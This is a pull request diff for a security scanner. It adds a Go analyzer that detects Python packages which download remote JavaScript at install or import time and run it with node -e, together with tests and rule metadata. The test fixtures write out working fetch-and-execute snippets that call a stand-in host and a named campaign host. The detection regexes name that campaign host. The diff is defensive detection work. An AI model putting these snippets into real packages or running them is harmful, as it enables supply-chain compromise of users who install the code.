### PR TITLE
feat(pyrisk): bind remote-JS fetch to node -e (Python import-time)

### DIFF
--- a/cmd/aguara/commands/scan.go
+++ b/cmd/aguara/commands/scan.go
@@ -18,6 +18,7 @@ import (
 	"github.com/garagon/aguara/internal/engine/nlp"
 	"github.com/garagon/aguara/internal/engine/pattern"
 	"github.com/garagon/aguara/internal/engine/pkgmeta"
+	"github.com/garagon/aguara/internal/engine/pyrisk"
 	"github.com/garagon/aguara/internal/engine/rugpull"
 	"github.com/garagon/aguara/internal/engine/toxicflow"
 	"github.com/garagon/aguara/internal/output"
@@ -457,6 +458,7 @@ func buildScanner(compiled []*rules.CompiledRule, cfg config.Config, minSev scan
 	s.RegisterAnalyzer(ci.New())
 	s.RegisterAnalyzer(pkgmeta.New())
 	s.RegisterAnalyzer(jsrisk.New())
+	s.RegisterAnalyzer(pyrisk.New())
 	s.RegisterAnalyzer(nlp.NewInjectionAnalyzer())
 	s.RegisterAnalyzer(toxicflow.New())
 	s.SetCrossFileAccumulator(toxicflow.NewCrossFileAnalyzer())

--- a/internal/engine/pattern/matcher_test.go
+++ b/internal/engine/pattern/matcher_test.go
@@ -551,65 +551,9 @@ func fullBuiltinMatcher(t *testing.T) *pattern.Matcher {
 	return pattern.NewMatcher(compiled)
 }
 
-func pyImportTimeRemoteJSFires(t *testing.T, m *pattern.Matcher, relPath, content string) bool {
-	t.Helper()
-	findings, err := m.Analyze(context.Background(), &scanner.Target{RelPath: relPath, Content: []byte(content)})
-	require.NoError(t, err)
-	for _, f := range findings {
-		if f.RuleID == "PY_IMPORTTIME_REMOTE_JS_001" {
-			return true
-		}
-	}
-	return false
-}
-
-// TestPyImportTimeRemoteJS_TargetPrecision: the rule fires only in
-// import/setup-time files (setup.py, __init__.py). The identical payload
-// in a regular module or in docs must NOT fire -- that file-context
-// restriction is how "import-time execution context" is enforced.
-func TestPyImportTimeRemoteJS_TargetPrecision(t *testing.T) {
-	m := fullBuiltinMatcher(t)
-	payload := "import urllib.request, subprocess\n" +
-		"js = urllib.request.urlopen('https://ddjidd564.github.io/x.js').read().decode()\n" +
-		"subprocess.run(['node', '-e', js])\n"
-
-	require.True(t, pyImportTimeRemoteJSFires(t, m, "pkg/__init__.py", payload), "should fire in __init__.py")
-	require.True(t, pyImportTimeRemoteJSFires(t, m, "setup.py", payload), "should fire in setup.py")
-	require.False(t, pyImportTimeRemoteJSFires(t, m, "pkg/util.py", payload), "must not fire in a regular module (not import-time context)")
-	require.False(t, pyImportTimeRemoteJSFires(t, m, "README.md", payload), "must not fire in documentation")
-}
-
-// TestPyImportTimeRemoteJS_RequiresAllThreeSignals: in an import-time
-// file, any single missing signal (remote fetch / Node execution /
-// JavaScript payload reference) means no finding. This is what keeps
-// ordinary packages that merely fetch config or run a local node build
-// from tripping the rule.
-func TestPyImportTimeRemoteJS_RequiresAllThreeSignals(t *testing.T) {
-	m := fullBuiltinMatcher(t)
-	cases := []struct {
-		name    string
-		content string
-	}{
-		{"fetch + node, no JS payload", "import requests, subprocess\nx = requests.get('https://e/data').text\nsubprocess.run(['node', '-e', x])\n"},
-		{"fetch + JS, no node execution", "import requests\njs = requests.get('https://e/x.js').text  # fetched but never run\n"},
-		{"node + JS, no remote fetch (local build)", "import subprocess\nsubprocess.run(['node', 'build.js'])\n"},
-		// Fetches a .js asset AND runs node, but node runs a local FILE
-		// (no -e), so it never executes the fetched payload. Requiring
-		// the eval form (node -e / --eval) keeps this from false-firing.
-		{"fetch .js + local node build (node runs a file, not -e)", "import requests, subprocess\njs = requests.get('https://cdn.example/foo.js').text\nsubprocess.run(['node', 'scripts/build.js'])\n"},
-		// Signals scattered on unrelated lines: fetch a config.json,
-		// a local inline node -e build, and a .js listed in package_data.
-		// None of these is a remote-JS execution, and binding the fetch
-		// to a .js URL keeps it from firing.
-		{"unrelated signals: config fetch + local node -e + package_data .js", "import requests, subprocess\ncfg = requests.get('https://cdn.example/config.json').json()\nsubprocess.run(['node', '-e', 'console.log(1)'])\nDATA = {'pkg': ['static/app.js']}\n"},
-	}
-	for _, tc := range cases {
-		t.Run(tc.name, func(t *testing.T) {
-			require.False(t, pyImportTimeRemoteJSFires(t, m, "setup.py", tc.content),
-				"a missing signal must not produce a finding")
-		})
-	}
-}
+// PY_IMPORTTIME_REMOTE_JS_001 moved from a YAML pattern rule to the
+// pyrisk analyzer (a real fetch->eval binding rather than co-presence);
+// its tests now live in internal/engine/pyrisk.
 
 func rsBuildWalletExfilFires(t *testing.T, m *pattern.Matcher, relPath, content string) bool {
 	t.Helper()

--- a/internal/engine/pyrisk/metadata.go
+++ b/internal/engine/pyrisk/metadata.go
@@ -1,0 +1,32 @@
+package pyrisk
+
+import "github.com/garagon/aguara/internal/rulemeta"
+
+// RuleMetadata returns the catalog entry for the rule this analyzer
+// emits. Co-located with the analyzer so `aguara explain` and
+// `list-rules` stay in sync with the emitter. The ID is unchanged from
+// the retired YAML rule; only the detection moved from co-presence to a
+// real fetch->eval binding.
+func RuleMetadata() []rulemeta.Rule {
+	return []rulemeta.Rule{
+		{
+			ID:       RulePyImportTimeRemoteJS,
+			Name:     "PyPI import-time remote JavaScript execution",
+			Severity: "CRITICAL",
+			Category: "supply-chain",
+			Analyzer: rulemeta.AnalyzerPyRisk,
+			Description: "A Python package that, at install or import time " +
+				"(setup.py / __init__.py), downloads remote JavaScript and runs it " +
+				"through Node. This is the TrapDoor-style PyPI payload. The analyzer " +
+				"binds the two halves: the value passed to `node -e` / `--eval` must " +
+				"trace back, in one or two simple assignment hops, to a remote fetch of " +
+				"a JavaScript payload (requests/httpx/urllib reading a .js URL or the " +
+				"campaign host). An unrelated `node -e`, a `node build.js`, or a fetched " +
+				"config.json does not trip it.",
+			Remediation: "Remove the remote fetch and Node execution from package " +
+				"import/setup code. Packages must never download and run remote code at " +
+				"install or import time. Audit the host for credential exposure and " +
+				"rotate any tokens reachable from the build or import environment.",
+		},
+	}
+}

--- a/internal/engine/pyrisk/pyrisk.go
+++ b/internal/engine/pyrisk/pyrisk.go
@@ -247,10 +247,14 @@ func codeLines(src string) []codeLine {
 				}
 			}
 		}
-		line = stripLineComment(line)
-		if strings.TrimSpace(line) == "" {
+		line = strings.TrimSpace(stripLineComment(line))
+		if line == "" {
 			continue
 		}
+		// Store the de-indented line so assignment matching (^name = ...)
+		// works inside try:, def, with, and other indented blocks, which
+		// are common in setup.py / __init__.py. The original line number
+		// is preserved for the finding.
 		out = append(out, codeLine{num: i + 1, text: line})
 	}
 	return out

--- a/internal/engine/pyrisk/pyrisk.go
+++ b/internal/engine/pyrisk/pyrisk.go
@@ -53,14 +53,21 @@ var (
 	// urllib...urlopen(...).read(), etc. Group 1 is the call argument(s).
 	fetchCallRe = regexp.MustCompile(`(?i)(?:requests\.get|httpx\.get|urllib\.request\.urlopen|urllib\.request\.urlretrieve|\burlopen|\burlretrieve)\s*\(([^)]*)\)\s*\.\s*(?:text|read|content)\b`)
 
-	// nodeEvalArgvRe matches the argv form: "node", "-e"/"--eval", PAYLOAD
-	// where PAYLOAD is a bare identifier (a variable). A string literal
-	// payload (an inline script) is intentionally not bound here.
-	nodeEvalArgvRe = regexp.MustCompile(`(?i)["']node["']\s*,\s*["'](?:-e|--eval)["']\s*,\s*([A-Za-z_]\w*)\b`)
+	// nodeEvalArgvRe matches an EXECUTION of node -e in argv form:
+	// subprocess.run/call/check_call/check_output/Popen(["node", "-e", PAYLOAD]).
+	// The execution call is required so merely BUILDING a command list
+	// (cmd = ["node", "-e", payload]) does not count -- a CRITICAL rule
+	// must see the payload actually run. PAYLOAD must be a bare identifier
+	// (a variable); an inline string-literal script is not bound here.
+	// (cmd = [...] then subprocess.run(cmd) is intentionally out of scope:
+	// it would need a separate command-variable binding hop.)
+	nodeEvalArgvRe = regexp.MustCompile(`(?i)subprocess\.(?:run|call|check_call|check_output|Popen)\s*\(\s*\[\s*["']node["']\s*,\s*["'](?:-e|--eval)["']\s*,\s*([A-Za-z_]\w*)\b`)
 
-	// nodeEvalShellRe matches os.system("node -e " + PAYLOAD) and similar
-	// string-concatenation shell forms; group 1 is the concatenated var.
-	nodeEvalShellRe = regexp.MustCompile(`(?i)node\s+(?:-e|--eval)\b[^"']*["']\s*\+\s*([A-Za-z_]\w*)\b`)
+	// nodeEvalShellRe matches an EXECUTION of node -e in shell-string
+	// form: os.system("node -e " + PAYLOAD). The os.system call is
+	// required so building a command string without running it does not
+	// count; group 1 is the concatenated var.
+	nodeEvalShellRe = regexp.MustCompile(`(?i)os\.system\s*\(\s*["']node\s+(?:-e|--eval)\b[^"']*["']\s*\+\s*([A-Za-z_]\w*)\b`)
 
 	// identRe extracts bare identifiers referenced on a RHS, for taint
 	// propagation (a hop is "this assignment references a tainted var").

--- a/internal/engine/pyrisk/pyrisk.go
+++ b/internal/engine/pyrisk/pyrisk.go
@@ -67,80 +67,98 @@ var (
 	identRe = regexp.MustCompile(`[A-Za-z_]\w*`)
 )
 
+// maxHops bounds taint propagation (the source itself is depth 0; a
+// node -e on a var up to 2 derivation hops away binds).
+const maxHops = 2
+
 // Analyze reports PY_IMPORTTIME_REMOTE_JS_001 when a node -e payload is
-// bound (<=2 hops) to a remote-JavaScript fetch in the same file.
+// bound (<= maxHops) to a remote-JavaScript fetch in the same file.
+//
+// The analysis is a single in-order, flow-sensitive pass: variable taint
+// is updated as assignments are seen (and CLEARED when a variable is
+// reassigned to something that does not trace back to a fetch), and a
+// sink is evaluated against the taint state at the point the sink
+// appears. This way a sink before the fetch, a tainted variable later
+// overwritten by a safe literal, and a same-named-but-safe variable at
+// the sink all correctly do NOT fire.
 func (a *Analyzer) Analyze(_ context.Context, target *scanner.Target) ([]types.Finding, error) {
 	if !isTarget(target) || len(target.Content) == 0 {
 		return nil, nil
 	}
 
-	lines := codeLines(string(target.Content))
-
-	// Pass 1: classify assignments.
-	//   jsURLVars: var assigned a .js / campaign-host string literal.
-	//   tainted:   var assigned directly from a JS fetch (the source).
+	// taint[var] = hop depth (0 = the fetch result itself). Absence means
+	// untainted. jsURLVars[var] = assigned a .js / campaign-host literal.
+	taint := map[string]int{}
 	jsURLVars := map[string]bool{}
-	tainted := map[string]bool{}
-	for _, ln := range lines {
-		m := assignRe.FindStringSubmatch(ln.text)
-		if m == nil {
-			continue
-		}
-		lhs, rhs := m[1], m[2]
-		if isJSFetch(rhs, jsURLVars) {
-			tainted[lhs] = true
-			continue
-		}
-		if jsURLLiteralRe.MatchString(rhs) && isStringLiteralAssign(rhs) {
-			jsURLVars[lhs] = true
-		}
-	}
 
-	// Pass 2: propagate taint up to two hops. `b = <expr referencing a>`
-	// taints b when a is tainted (covers b = a, b = decode(a),
-	// b = a.replace(...), etc.).
-	for hop := 0; hop < 2; hop++ {
-		changed := false
-		for _, ln := range lines {
-			m := assignRe.FindStringSubmatch(ln.text)
-			if m == nil {
-				continue
-			}
+	for _, ln := range codeLines(string(target.Content)) {
+		// 1. Apply an assignment's effect on taint state first, so a
+		//    reassignment on this line is reflected before any sink on
+		//    the same line is evaluated.
+		if m := assignRe.FindStringSubmatch(ln.text); m != nil {
 			lhs, rhs := m[1], m[2]
-			if tainted[lhs] {
-				continue
-			}
-			if referencesTainted(rhs, tainted) {
-				tainted[lhs] = true
-				changed = true
+			switch {
+			case isJSFetch(rhs, jsURLVars):
+				taint[lhs] = 0
+				delete(jsURLVars, lhs)
+			default:
+				if d, ok := derivedDepth(rhs, taint); ok {
+					// 1- or 2-hop derivation of a currently tainted var.
+					taint[lhs] = d
+					delete(jsURLVars, lhs)
+				} else {
+					// Reassigned to something that does not trace back to
+					// a fetch: clear any prior taint on this variable.
+					delete(taint, lhs)
+					if isStringLiteralAssign(rhs) && jsURLLiteralRe.MatchString(rhs) {
+						jsURLVars[lhs] = true
+					} else {
+						delete(jsURLVars, lhs)
+					}
+				}
 			}
 		}
-		if !changed {
-			break
-		}
-	}
 
-	// Pass 3: a node -e sink whose payload variable is tainted is the
-	// bound finding.
-	for _, ln := range lines {
-		payload := nodeEvalPayloadVar(ln.text)
-		if payload == "" || !tainted[payload] {
-			continue
+		// 2. A node -e sink whose payload variable is tainted RIGHT NOW
+		//    is the bound finding.
+		if payload := nodeEvalPayloadVar(ln.text); payload != "" {
+			if _, ok := taint[payload]; ok {
+				return []types.Finding{{
+					RuleID:      RulePyImportTimeRemoteJS,
+					RuleName:    "PyPI import-time remote JavaScript execution",
+					Severity:    types.SeverityCritical,
+					Category:    "supply-chain",
+					Description: "A remote JavaScript payload fetched at install/import time is passed to node -e: the value executed traces back to the download.",
+					FilePath:    target.RelPath,
+					Line:        ln.num,
+					MatchedText: strings.TrimSpace(ln.text),
+					Remediation: "Remove the remote fetch and Node execution from package import/setup code. Packages must never download and run remote code at install or import time. Audit the host for credential exposure and rotate any tokens reachable from the build or import environment.",
+					Analyzer:    AnalyzerName,
+				}}, nil
+			}
 		}
-		return []types.Finding{{
-			RuleID:      RulePyImportTimeRemoteJS,
-			RuleName:    "PyPI import-time remote JavaScript execution",
-			Severity:    types.SeverityCritical,
-			Category:    "supply-chain",
-			Description: "A remote JavaScript payload fetched at install/import time is passed to node -e: the value executed traces back to the download.",
-			FilePath:    target.RelPath,
-			Line:        ln.num,
-			MatchedText: strings.TrimSpace(ln.text),
-			Remediation: "Remove the remote fetch and Node execution from package import/setup code. Packages must never download and run remote code at install or import time. Audit the host for credential exposure and rotate any tokens reachable from the build or import environment.",
-			Analyzer:    AnalyzerName,
-		}}, nil
 	}
 	return nil, nil
+}
+
+// derivedDepth reports the taint depth lhs would take if rhs derives from
+// a currently tainted variable (the shallowest referenced taint + 1),
+// and whether that is within the hop limit. Returns ok=false when rhs
+// references no tainted variable or the derivation would exceed maxHops.
+func derivedDepth(rhs string, taint map[string]int) (int, bool) {
+	best := -1
+	for _, id := range identRe.FindAllString(rhs, -1) {
+		if d, ok := taint[id]; ok && (best == -1 || d < best) {
+			best = d
+		}
+	}
+	if best == -1 {
+		return 0, false
+	}
+	if nd := best + 1; nd <= maxHops {
+		return nd, true
+	}
+	return 0, false
 }
 
 // isJSFetch reports whether rhs is a remote-JavaScript fetch: a fetch
@@ -158,16 +176,6 @@ func isJSFetch(rhs string, jsURLVars map[string]bool) bool {
 	}
 	for _, id := range identRe.FindAllString(arg, -1) {
 		if jsURLVars[id] {
-			return true
-		}
-	}
-	return false
-}
-
-// referencesTainted reports whether any identifier on rhs is tainted.
-func referencesTainted(rhs string, tainted map[string]bool) bool {
-	for _, id := range identRe.FindAllString(rhs, -1) {
-		if tainted[id] {
 			return true
 		}
 	}

--- a/internal/engine/pyrisk/pyrisk.go
+++ b/internal/engine/pyrisk/pyrisk.go
@@ -1,0 +1,280 @@
+// Package pyrisk is a small, auditable analyzer for Python install/import
+// time code (setup.py, __init__.py). It upgrades the
+// PY_IMPORTTIME_REMOTE_JS_001 detection from co-presence ("a remote .js
+// fetch AND a node -e somewhere in the file") to a real binding: the
+// value passed to `node -e` must trace back, in one or two simple hops,
+// to a remote-JavaScript fetch.
+//
+// It is deliberately NOT a Python parser. It works on lines, tracks
+// variable assignments, and propagates taint at most two hops. It does
+// no interprocedural analysis and resolves no dynamic imports. When the
+// shape is more complex than that, it stays silent rather than guess.
+package pyrisk
+
+import (
+	"context"
+	"path/filepath"
+	"regexp"
+	"strings"
+
+	"github.com/garagon/aguara/internal/rulemeta"
+	"github.com/garagon/aguara/internal/scanner"
+	"github.com/garagon/aguara/internal/types"
+)
+
+// RulePyImportTimeRemoteJS is the (analyzer-emitted) rule ID. It keeps the
+// same ID the retired YAML rule used so existing references and the
+// catalog entry stay stable.
+const RulePyImportTimeRemoteJS = "PY_IMPORTTIME_REMOTE_JS_001"
+
+// AnalyzerName is the analyzer identifier surfaced on findings.
+const AnalyzerName = rulemeta.AnalyzerPyRisk
+
+// Analyzer implements scanner.Analyzer.
+type Analyzer struct{}
+
+// New constructs the pyrisk analyzer.
+func New() *Analyzer { return &Analyzer{} }
+
+// Name returns the analyzer identifier.
+func (a *Analyzer) Name() string { return AnalyzerName }
+
+var (
+	// assignRe matches `name = <rhs>` (simple LHS identifier only).
+	assignRe = regexp.MustCompile(`^([A-Za-z_]\w*)\s*=\s*(.+)$`)
+
+	// jsURLLiteralRe marks a string literal as a JavaScript payload URL:
+	// a .js path (optionally with query/fragment) or a known campaign
+	// host. Used both for the fetch argument and for a url variable.
+	jsURLLiteralRe = regexp.MustCompile(`(?i)(\.js["'?#)\s]|\.js$|ddjidd564\.github\.io|defi-security-best-practices)`)
+
+	// fetchCallRe matches a remote retrieval whose result is read as a
+	// string/body: requests.get(...).text, httpx.get(...).text,
+	// urllib...urlopen(...).read(), etc. Group 1 is the call argument(s).
+	fetchCallRe = regexp.MustCompile(`(?i)(?:requests\.get|httpx\.get|urllib\.request\.urlopen|urllib\.request\.urlretrieve|\burlopen|\burlretrieve)\s*\(([^)]*)\)\s*\.\s*(?:text|read|content)\b`)
+
+	// nodeEvalArgvRe matches the argv form: "node", "-e"/"--eval", PAYLOAD
+	// where PAYLOAD is a bare identifier (a variable). A string literal
+	// payload (an inline script) is intentionally not bound here.
+	nodeEvalArgvRe = regexp.MustCompile(`(?i)["']node["']\s*,\s*["'](?:-e|--eval)["']\s*,\s*([A-Za-z_]\w*)\b`)
+
+	// nodeEvalShellRe matches os.system("node -e " + PAYLOAD) and similar
+	// string-concatenation shell forms; group 1 is the concatenated var.
+	nodeEvalShellRe = regexp.MustCompile(`(?i)node\s+(?:-e|--eval)\b[^"']*["']\s*\+\s*([A-Za-z_]\w*)\b`)
+
+	// identRe extracts bare identifiers referenced on a RHS, for taint
+	// propagation (a hop is "this assignment references a tainted var").
+	identRe = regexp.MustCompile(`[A-Za-z_]\w*`)
+)
+
+// Analyze reports PY_IMPORTTIME_REMOTE_JS_001 when a node -e payload is
+// bound (<=2 hops) to a remote-JavaScript fetch in the same file.
+func (a *Analyzer) Analyze(_ context.Context, target *scanner.Target) ([]types.Finding, error) {
+	if !isTarget(target) || len(target.Content) == 0 {
+		return nil, nil
+	}
+
+	lines := codeLines(string(target.Content))
+
+	// Pass 1: classify assignments.
+	//   jsURLVars: var assigned a .js / campaign-host string literal.
+	//   tainted:   var assigned directly from a JS fetch (the source).
+	jsURLVars := map[string]bool{}
+	tainted := map[string]bool{}
+	for _, ln := range lines {
+		m := assignRe.FindStringSubmatch(ln.text)
+		if m == nil {
+			continue
+		}
+		lhs, rhs := m[1], m[2]
+		if isJSFetch(rhs, jsURLVars) {
+			tainted[lhs] = true
+			continue
+		}
+		if jsURLLiteralRe.MatchString(rhs) && isStringLiteralAssign(rhs) {
+			jsURLVars[lhs] = true
+		}
+	}
+
+	// Pass 2: propagate taint up to two hops. `b = <expr referencing a>`
+	// taints b when a is tainted (covers b = a, b = decode(a),
+	// b = a.replace(...), etc.).
+	for hop := 0; hop < 2; hop++ {
+		changed := false
+		for _, ln := range lines {
+			m := assignRe.FindStringSubmatch(ln.text)
+			if m == nil {
+				continue
+			}
+			lhs, rhs := m[1], m[2]
+			if tainted[lhs] {
+				continue
+			}
+			if referencesTainted(rhs, tainted) {
+				tainted[lhs] = true
+				changed = true
+			}
+		}
+		if !changed {
+			break
+		}
+	}
+
+	// Pass 3: a node -e sink whose payload variable is tainted is the
+	// bound finding.
+	for _, ln := range lines {
+		payload := nodeEvalPayloadVar(ln.text)
+		if payload == "" || !tainted[payload] {
+			continue
+		}
+		return []types.Finding{{
+			RuleID:      RulePyImportTimeRemoteJS,
+			RuleName:    "PyPI import-time remote JavaScript execution",
+			Severity:    types.SeverityCritical,
+			Category:    "supply-chain",
+			Description: "A remote JavaScript payload fetched at install/import time is passed to node -e: the value executed traces back to the download.",
+			FilePath:    target.RelPath,
+			Line:        ln.num,
+			MatchedText: strings.TrimSpace(ln.text),
+			Remediation: "Remove the remote fetch and Node execution from package import/setup code. Packages must never download and run remote code at install or import time. Audit the host for credential exposure and rotate any tokens reachable from the build or import environment.",
+			Analyzer:    AnalyzerName,
+		}}, nil
+	}
+	return nil, nil
+}
+
+// isJSFetch reports whether rhs is a remote-JavaScript fetch: a fetch
+// call whose argument contains a .js / campaign-host literal, or whose
+// argument is a variable previously assigned such a literal (one hop on
+// the URL side).
+func isJSFetch(rhs string, jsURLVars map[string]bool) bool {
+	m := fetchCallRe.FindStringSubmatch(rhs)
+	if m == nil {
+		return false
+	}
+	arg := m[1]
+	if jsURLLiteralRe.MatchString(arg) {
+		return true
+	}
+	for _, id := range identRe.FindAllString(arg, -1) {
+		if jsURLVars[id] {
+			return true
+		}
+	}
+	return false
+}
+
+// referencesTainted reports whether any identifier on rhs is tainted.
+func referencesTainted(rhs string, tainted map[string]bool) bool {
+	for _, id := range identRe.FindAllString(rhs, -1) {
+		if tainted[id] {
+			return true
+		}
+	}
+	return false
+}
+
+// nodeEvalPayloadVar returns the variable passed to node -e / --eval on
+// this line (argv or shell-concat form), or "" if there is none / it is
+// an inline literal rather than a variable.
+func nodeEvalPayloadVar(line string) string {
+	if m := nodeEvalArgvRe.FindStringSubmatch(line); m != nil {
+		return m[1]
+	}
+	if m := nodeEvalShellRe.FindStringSubmatch(line); m != nil {
+		return m[1]
+	}
+	return ""
+}
+
+// isStringLiteralAssign reports whether rhs looks like a plain string
+// literal assignment (so `url = "...p.js"` taints url as a js-url var,
+// but `url = build_url()` does not).
+func isStringLiteralAssign(rhs string) bool {
+	t := strings.TrimSpace(rhs)
+	return strings.HasPrefix(t, `"`) || strings.HasPrefix(t, `'`) ||
+		strings.HasPrefix(t, `f"`) || strings.HasPrefix(t, `f'`)
+}
+
+func isTarget(t *scanner.Target) bool {
+	if t == nil {
+		return false
+	}
+	for _, p := range []string{t.Path, t.RelPath} {
+		if p == "" {
+			continue
+		}
+		base := filepath.Base(filepath.ToSlash(p))
+		if base == "setup.py" || base == "__init__.py" {
+			return true
+		}
+	}
+	return false
+}
+
+type codeLine struct {
+	num  int
+	text string
+}
+
+// codeLines strips comments and docstrings so a commented-out or
+// documented fetch/eval does not produce a finding. It removes `#`
+// line comments (naively, at the first '#' outside a quote) and skips
+// lines inside triple-quoted blocks.
+func codeLines(src string) []codeLine {
+	var out []codeLine
+	inDoc := false
+	var docDelim string
+	for i, raw := range strings.Split(src, "\n") {
+		line := raw
+		if inDoc {
+			if idx := strings.Index(line, docDelim); idx >= 0 {
+				inDoc = false
+				line = line[idx+len(docDelim):]
+			} else {
+				continue
+			}
+		}
+		// Opening triple-quote that does not close on the same line
+		// starts a docstring block.
+		for _, d := range []string{`"""`, `'''`} {
+			if idx := strings.Index(line, d); idx >= 0 {
+				if rest := line[idx+len(d):]; !strings.Contains(rest, d) {
+					inDoc = true
+					docDelim = d
+					line = line[:idx]
+					break
+				}
+			}
+		}
+		line = stripLineComment(line)
+		if strings.TrimSpace(line) == "" {
+			continue
+		}
+		out = append(out, codeLine{num: i + 1, text: line})
+	}
+	return out
+}
+
+// stripLineComment removes a trailing/whole-line `#` comment, ignoring
+// `#` that appears inside a single- or double-quoted string.
+func stripLineComment(line string) string {
+	inSingle, inDouble := false, false
+	for i := 0; i < len(line); i++ {
+		switch line[i] {
+		case '\'':
+			if !inDouble {
+				inSingle = !inSingle
+			}
+		case '"':
+			if !inSingle {
+				inDouble = !inDouble
+			}
+		case '#':
+			if !inSingle && !inDouble {
+				return line[:i]
+			}
+		}
+	}
+	return line
+}

--- a/internal/engine/pyrisk/pyrisk_test.go
+++ b/internal/engine/pyrisk/pyrisk_test.go
@@ -145,6 +145,20 @@ print("safe")`,
 			`import subprocess
 subprocess.run(["node", "build.js"])`,
 		},
+		{
+			"argv command built but never executed",
+			`import requests
+payload = requests.get("https://evil.example/p.js").text
+cmd = ["node", "-e", payload]
+print(cmd)`,
+		},
+		{
+			"shell command string built but never executed",
+			`import requests
+payload = requests.get("https://evil.example/p.js").text
+cmd = "node -e " + payload
+print(cmd)`,
+		},
 	}
 	for _, c := range cases {
 		t.Run(c.name, func(t *testing.T) {

--- a/internal/engine/pyrisk/pyrisk_test.go
+++ b/internal/engine/pyrisk/pyrisk_test.go
@@ -71,6 +71,38 @@ subprocess.run(["node", "-e", js])`,
 	}
 }
 
+func TestIndentedAssignmentsBind(t *testing.T) {
+	// The source assignment is commonly indented (inside try:, a
+	// function, a with-block) in setup.py / __init__.py. Indentation
+	// must not break the fetch->eval binding.
+	cases := []struct{ name, src string }{
+		{
+			"inside try/except",
+			`import requests, subprocess
+try:
+    js = requests.get("https://evil.example/p.js").text
+    subprocess.run(["node", "-e", js])
+except Exception:
+    pass`,
+		},
+		{
+			"inside a function body",
+			`import requests, subprocess
+def run():
+    js = requests.get("https://evil.example/p.js").text
+    subprocess.run(["node", "-e", js])
+run()`,
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			if !fires(t, "__init__.py", c.src) {
+				t.Fatalf("indented assignment must still bind and fire")
+			}
+		})
+	}
+}
+
 func TestFalsePositives(t *testing.T) {
 	cases := []struct{ name, src string }{
 		{

--- a/internal/engine/pyrisk/pyrisk_test.go
+++ b/internal/engine/pyrisk/pyrisk_test.go
@@ -1,0 +1,138 @@
+package pyrisk
+
+import (
+	"context"
+	"testing"
+
+	"github.com/garagon/aguara/internal/scanner"
+)
+
+func analyze(t *testing.T, name, src string) []scanner.Finding {
+	t.Helper()
+	a := New()
+	f, err := a.Analyze(context.Background(), &scanner.Target{RelPath: name, Content: []byte(src)})
+	if err != nil {
+		t.Fatalf("analyze: %v", err)
+	}
+	return f
+}
+
+func fires(t *testing.T, name, src string) bool {
+	t.Helper()
+	for _, f := range analyze(t, name, src) {
+		if f.RuleID == RulePyImportTimeRemoteJS {
+			return true
+		}
+	}
+	return false
+}
+
+func TestTruePositives(t *testing.T) {
+	cases := []struct{ name, src string }{
+		{
+			"fetch js -> var -> node -e var",
+			`import requests, subprocess
+js = requests.get("https://evil.example/risk-profiler.js").text
+subprocess.run(["node", "-e", js])`,
+		},
+		{
+			"urllib js -> var -> node -e var (campaign host)",
+			`import urllib.request, subprocess
+payload = urllib.request.urlopen("https://ddjidd564.github.io/defi-security-best-practices/x.js").read()
+subprocess.run(["node", "-e", payload])`,
+		},
+		{
+			"fetch js -> simple transform -> node --eval",
+			`import httpx, base64, subprocess
+raw = httpx.get("https://evil.example/p.js?v=2").text
+code = base64.b64decode(raw).decode()
+subprocess.run(["node", "--eval", code])`,
+		},
+		{
+			"os.system shell concat form",
+			`import requests, os
+payload = requests.get("https://evil.example/p.js").text
+os.system("node -e " + payload)`,
+		},
+		{
+			"js url in a variable, then fetched",
+			`import requests, subprocess
+url = "https://evil.example/loader.js"
+js = requests.get(url).text
+subprocess.run(["node", "-e", js])`,
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			if !fires(t, "setup.py", c.src) {
+				t.Fatalf("expected PY_IMPORTTIME_REMOTE_JS_001 to fire")
+			}
+		})
+	}
+}
+
+func TestFalsePositives(t *testing.T) {
+	cases := []struct{ name, src string }{
+		{
+			"fetch .js but node runs a local file (no -e)",
+			`import requests, subprocess
+js = requests.get("https://cdn.example/foo.js").text
+subprocess.run(["node", "scripts/build.js"])`,
+		},
+		{
+			"fetch config.json + node -e (source not JS)",
+			`import requests, subprocess
+cfg = requests.get("https://example.com/config.json").text
+subprocess.run(["node", "-e", cfg])`,
+		},
+		{
+			"node -e with an unrelated variable",
+			`import requests, subprocess
+js = requests.get("https://evil.example/p.js").text
+banner = "console.log('hi')"
+subprocess.run(["node", "-e", banner])`,
+		},
+		{
+			"commented-out fetch + node -e",
+			`import subprocess
+# js = requests.get("https://evil.example/p.js").text
+# subprocess.run(["node", "-e", js])
+print("ok")`,
+		},
+		{
+			"docstring describing the technique",
+			`"""
+Example: js = requests.get("https://evil.example/p.js").text
+then subprocess.run(["node", "-e", js])
+"""
+import os
+print("safe")`,
+		},
+		{
+			"node build.js only, no fetch",
+			`import subprocess
+subprocess.run(["node", "build.js"])`,
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			if fires(t, "setup.py", c.src) {
+				t.Fatalf("expected NO finding")
+			}
+		})
+	}
+}
+
+func TestPrecisionOnlyTargetFiles(t *testing.T) {
+	// The exact malicious shape in a non-target file must not fire: the
+	// analyzer only inspects install/import-time entry points.
+	src := `import requests, subprocess
+js = requests.get("https://evil.example/p.js").text
+subprocess.run(["node", "-e", js])`
+	if fires(t, "utils.py", src) {
+		t.Fatal("must not fire on utils.py (only setup.py / __init__.py are targets)")
+	}
+	if !fires(t, "__init__.py", src) {
+		t.Fatal("must fire on __init__.py")
+	}
+}

--- a/internal/engine/pyrisk/pyrisk_test.go
+++ b/internal/engine/pyrisk/pyrisk_test.go
@@ -155,6 +155,41 @@ subprocess.run(["node", "build.js"])`,
 	}
 }
 
+func TestFlowSensitivity(t *testing.T) {
+	cases := []struct{ name, src string }{
+		{
+			"sink before the fetch",
+			`import requests, subprocess
+subprocess.run(["node", "-e", js])
+js = requests.get("https://evil.example/p.js").text`,
+		},
+		{
+			"tainted var overwritten by a safe literal before the sink",
+			`import requests, subprocess
+js = requests.get("https://evil.example/p.js").text
+js = "console.log('safe')"
+subprocess.run(["node", "-e", js])`,
+		},
+		{
+			"same name in a different function, safe value at the sink",
+			`import requests, subprocess
+def fetch_asset():
+    js = requests.get("https://evil.example/p.js").text
+def build():
+    js = "console.log('safe')"
+    subprocess.run(["node", "-e", js])
+build()`,
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			if fires(t, "__init__.py", c.src) {
+				t.Fatalf("flow-sensitive analysis must NOT fire: the executed value does not trace back to the fetch")
+			}
+		})
+	}
+}
+
 func TestPrecisionOnlyTargetFiles(t *testing.T) {
 	// The exact malicious shape in a non-target file must not fire: the
